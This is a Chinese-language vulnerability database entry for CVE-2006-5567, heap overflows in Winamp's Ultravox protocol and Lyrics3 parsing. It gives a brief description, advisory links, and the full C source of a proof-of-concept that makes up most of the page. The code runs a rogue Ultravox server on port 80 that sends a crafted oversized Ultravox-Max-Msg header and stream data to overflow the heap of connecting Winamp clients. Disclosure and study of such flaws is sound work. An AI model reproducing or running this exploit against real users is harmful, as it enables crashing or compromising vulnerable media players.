Nullsoft Winamp Ultravox多个远程堆溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111451 漏洞类型 缓冲区溢出
发布时间 2006-11-03 更新时间 2007-06-25
CVE编号 CVE-2006-5567 CNNVD-ID CNNVD-200610-504
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/2708
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-504
|漏洞详情
Winamp是一款流行的媒体播放器,支持多种文件格式。Winamp的Ultravox协议处理器在处理ultravox-max-msg头时存在堆溢出漏洞。恶意的服务器可能导致Winamp客户端分配很小的空间,然后填充大量的服务器数据来触发这个溢出,最终执行任意指令。Winamp的UltravoxLyrics3解析代码中也存在堆溢出漏洞。如果解析了某些Lyrics3标签,恶意的服务器可能导致Winamp客户端分配很小的空间,然后填充大量的服务器数据来触发这个溢出,最终执行任意指令。
|漏洞EXP
/************************************************************************************
Nullsoft Winamp < 5.31 Ultravox "Ultravox-Max-Msg" Heap Overflow Dos POC

by cocoruder(frankruder_at_hotmail.com),2006/10/30

use like "winamp_unsv.exe ultravox-max-msg_value",then the winamp_unsv(simple ultravox 
server) will listen on tcp port 80,when winamp connect the server via ultravox protocol

usage example:
    winamp_unsv.exe 500000000
    winamp_unsv.exe 2147481601

**************************************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>
 
#define SERVER_PORT  80

unsigned char    buff1_header1[]=
"HTTP/1.0 200 OK\x0D\x0A"
"Server: Ultravox 3.0\x0D\x0A"
"Content-Type: misc/ultravox\x0D\x0A"
"Ultravox-SID: 13381\x0D\x0A"
"Ultravox-Avg-Bitrate: 16000\x0D\x0A"
"Ultravox-Max-Bitrate: 24000\x0D\x0A"
"Ultravox-Max-Msg: ";

unsigned char    buff1_header2[]=
"\x0D\x0A"
"Ultravox-Stream-Info: Ultravox;Live Stream\x0D\x0A"
"Ultravox-Msg-Que: 42\x0D\x0A"
"Ultravox-Max-Fragments: 1\x0D\x0A\x0D\x0A";

//4294965247
//1073739776
//1073739775
//1000000000
// 500000000
//  50000000

unsigned char    buff2[]=
                                                        "\x5a\x00"
"\x39\x01\x01\xe0\x00\x01\x00\x01\x00\x01\x3c\x6d\x65\x74\x61\x64"
"\x61\x74\x61\x3e\x3c\x6c\x65\x6e\x67\x74\x68\x3e\x30\x3c\x2f\x6c"
"\x65\x6e\x67\x74\x68\x3e\x3c\x73\x6f\x6f\x6e\x3e\x4d\x6f\x72\x65"
"\x20\x6f\x6e\x20\x54\x48\x45\x20\x35\x30\x73\x3c\x2f\x73\x6f\x6f"
"\x6e\x3e\x3c\x73\x6f\x6e\x67\x3e\x3c\x6e\x61\x6d\x65\x3e\x54\x69"
"\x6e\x61\x20\x4d\x61\x72\x69\x65\x20\x28\x31\x39\x35\x35\x29\x3c"
"\x2f\x6e\x61\x6d\x65\x3e\x3c\x61\x6c\x62\x75\x6d\x3e\x47\x72\x65"
"\x61\x74\x65\x73\x74\x20\x48\x69\x74\x73\x3c\x2f\x61\x6c\x62\x75"
"\x6d\x3e\x3c\x61\x72\x74\x69\x73\x74\x3e\x50\x65\x72\x72\x79\x20"
"\x43\x6f\x6d\x6f\x20\x6f\x26\x23\x34\x37\x3b\x4d\x69\x74\x63\x68"
"\x65\x6c\x6c\x20\x41\x79\x72\x65\x73\x3c\x2f\x61\x72\x74\x69\x73"
"\x74\x3e\x3c\x61\x6c\x62\x75\x6d\x5f\x61\x72\x74\x3e\x78\x6d\x2f"
"\x73\x74\x61\x74\x69\x6f\x6e\x5f\x6c\x6f\x67\x6f\x5f\x35\x2e\x6a"
"\x70\x67\x3c\x2f\x61\x6c\x62\x75\x6d\x5f\x61\x72\x74\x3e\x3c\x73"
"\x65\x72\x69\x61\x6c\x3e\x2d\x31\x3c\x2f\x73\x65\x72\x69\x61\x6c"
"\x3e\x3c\x73\x6f\x6e\x67\x5f\x69\x64\x3e\x2d\x31\x3c\x2f\x73\x6f"
"\x6e\x67\x5f\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x61\x72\x74\x69\x73\x74\x5f\x69"
"\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x61\x72\x74\x69\x73\x74"
"\x5f\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x61\x6c\x62\x75\x6d\x5f\x69"
"\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x61\x6c\x62\x75\x6d\x5f"
"\x69\x64\x3e\x3c\x69\x74\x75\x6e\x65\x73\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x2d\x31\x3c\x2f\x69\x74\x75\x6e\x65\x73\x5f\x73\x6f"
"\x6e\x67\x5f\x69\x64\x3e\x3c\x69\x74\x75\x6e\x65\x73\x5f\x61\x72"
"\x74\x69\x73\x74\x5f\x69\x64\x3e\x2d\x31\x3c\x2f\x69\x74\x75\x6e"
"\x65\x73\x5f\x61\x72\x74\x69\x73\x74\x5f\x69\x64\x3e\x3c\x69\x74"
"\x75\x6e\x65\x73\x5f\x61\x6c\x62\x75\x6d\x5f\x69\x64\x3e\x2d\x31"
"\x3c\x2f\x69\x74\x75\x6e\x65\x73\x5f\x61\x6c\x62\x75\x6d\x5f\x69"
"\x64\x3e\x3c\x2f\x73\x6f\x6e\x67\x3e\x3c\x2f\x6d\x65\x74\x61\x64"
"\x61\x74\x61\x3e\x00\x5a\x00\x80\x03\x03\x67\xff\xf9\x5c\x40\x0b"
"\xc1\x5c\x01\x62\x31\xa5\xe3\x40\x0e\x92\xda\x57\x42\x9c\xfa\x68"
"\xd3\xb3\xdb\x4b\x69\x89\x04\x00\x00\x2b\x8c\xbb\x5f\x92\xf3\x34"
"\x5a\x91\x5b\x43\xb0\xe1\x9b\x2f\x26\x66\x32\x67\x45\x59\x1e\x3c"
"\x68\x87\xfd\x97\x96\xa5\x75\x18\x0a\x27\x04\x0f\x09\xeb\x20\xb4"
"\x92\x0e\x18\xc5\xbc\xc8\xf8\xa6\x51\x12\x29\xe0\xf9\x81\x1b\xa6";

 
int main (int argc, char *argv[])
{
   int                        i, num=1, rc, on = 1;
   int                        listen_sd, accept_sd;
   char                        buffer[80];
   struct sockaddr_in        addr;
   WSADATA                    wsadata;
   unsigned char            *lpbuff;
   DWORD                    bufflen;

    int                        aa=-0x1000;
   
 
   WSAStartup(MAKEWORD(2,2),&wsadata);

   listen_sd = socket(AF_INET, SOCK_STREAM, 0);
   if (listen_sd < 0)
   {
      perror("socket() failed");
      exit(-1);
   }
 

   rc = setsockopt(listen_sd,
                   SOL_SOCKET,  SO_REUSEADDR,
                   (char *)&on, sizeof(on));
   if (rc < 0)
   {
      perror("setsockopt() failed");
      closesocket(listen_sd);
      exit(-1);
   }
 
    
   
   //Bind the socket 
   memset(&addr, 0, sizeof(addr));
   addr.sin_family      = AF_INET;
   addr.sin_addr.s_addr = htonl(INADDR_ANY);
   addr.sin_port        = htons(SERVER_PORT);
   rc = bind(listen_sd,
             (struct sockaddr *)&addr, sizeof(addr));
   if (rc < 0)
   {
      perror("bind() failed");
      closesocket(listen_sd);
      exit(-1);
   }
 

   rc = listen(listen_sd, 5);
   if (rc < 0)
   {
      perror("listen() failed");
      closesocket(listen_sd);
      exit(-1);
   }
 

   printf("The server is ready\n");


   bufflen=sizeof(buff1_header1)-1+strlen(argv[1])+sizeof(buff1_header2)-1;
   lpbuff=(unsigned char *)malloc(bufflen);
   if (lpbuff==NULL)
   {
       printf("malloc error!\n");
       return -1;
   }

   memset(lpbuff,0,bufflen);
   strcat((char *)lpbuff,(char *)buff1_header1);
   strcat((char *)lpbuff,(char *)argv[1]);
   strcat((char *)lpbuff,(char *)buff1_header2);


   for (i=0; i < num; i++)
   {

      printf("Interation: %d\n", i+1);
      printf("  waiting on accept()\n");
      accept_sd = accept(listen_sd, NULL, NULL);
      if (accept_sd < 0)
      {
         perror("accept() failed");
         closesocket(listen_sd);
         exit(-1);
      }
      printf("  accept completed successfully\n");
 

      printf("  wait for client to send us a message\n");

      

      rc = recv(accept_sd, buffer, sizeof(buffer), 0);
      if (rc <= 0)
      {
         perror("recv() failed");
         closesocket(listen_sd);
         closesocket(accept_sd);
         exit(-1);
      }
      printf("  <%s>\n", buffer);

      rc= send(accept_sd,(char *)lpbuff,bufflen,0);
      if (rc>0)
      {
          printf("send ultravox header OK!\n");
      }


      rc=send(accept_sd,(char *)buff2,sizeof(buff2)-1,0);
      if (rc>0)
      {
          printf("send ultravox first stream OK!\n");
      }
          
 

     while (1)
     {
         Sleep(1000);
     }
   }
 
   closesocket(listen_sd);

   return    0;

}

// milw0rm.com [2006-11-03]
|参考资料

来源:VU#449092
名称:VU#449092
链接:http://www.kb.cert.org/vuls/id/449092
来源:BID
名称:20744
链接:http://www.securityfocus.com/bid/20744
来源:VUPEN
名称:ADV-2006-4196
链接:http://www.frsirt.com/english/advisories/2006/4196
来源:SECTRACK
名称:1017120
链接:http://securitytracker.com/id?1017120
来源:SECUNIA
名称:22580
链接:http://secunia.com/advisories/22580
来源:IDEFENSE
名称:20061025AOLNullsoftWinampLyrics3v2.00tagsHeapOverflowVulnerability
链接:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=432
来源:IDEFENSE
名称:20061025AOLNullsoftWinampUltravox'ultravox-max-msg'HeaderHeapOverflowVulnerability
链接:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=431
来源:XF
名称:winamp-lyrics3-bo(29807)
链接:http://xforce.iss.net/xforce/xfdb/29807
来源:XF
名称:winamp-ultravox-bo(29804)
链接:http://xforce.iss.net/xforce/xfdb/29804
来源:www.winamp.com
链接:http://www.winamp.com/player/version_history.php#5.31
来源:SECTRACK
名称:1017119
链接:http://securitytracker.com/id?1017119